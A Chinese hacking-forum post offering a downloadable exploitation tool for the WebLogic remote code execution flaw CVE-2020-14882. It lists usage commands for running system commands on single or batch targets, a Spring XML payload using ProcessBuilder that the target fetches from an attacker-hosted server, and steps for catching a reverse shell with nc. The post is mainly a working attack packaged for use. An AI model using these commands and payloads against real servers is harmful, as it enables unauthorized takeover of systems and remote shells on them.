查看: 23162|回复: 2

Weblogic远程代码执行-CVE-2020-14882

[复制链接]
发表于 2020-11-3 21:09:33 | 显示全部楼层 |阅读模式
CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
需要模块:requests、http.client

1.png

功能一:命令回显
  1. python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"
复制代码

2.png

  1. python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"
复制代码

3.png

功能二:批量命令回显
  1. python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
复制代码


target.txt 格式:http://x.x.x.x:xx,一行一个
4.png

功能三:外置xml文件无回显命令执行
1、Linux反弹shell为例,编辑好poc.xml文件,开启python监听。

  1. <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  2.   <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
  3.     <constructor-arg>
  4.       <list>
  5.         <value>cmd</value>
  6.       </list>
  7.     </constructor-arg>
  8.   </bean>
  9. </beans>
复制代码


开启python监听
5.png

nc开启监听
6.png

2、使用-x选项指定xml文件路径,发送payload。

  1. python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
复制代码

7.png

3、成功接收shell
8.png

CVE-2020-14882_ALL-master.zip (460.08 KB, 下载次数: 1, 售价: 3 i币)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 14:11 , Processed in 0.507434 second(s), 25 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部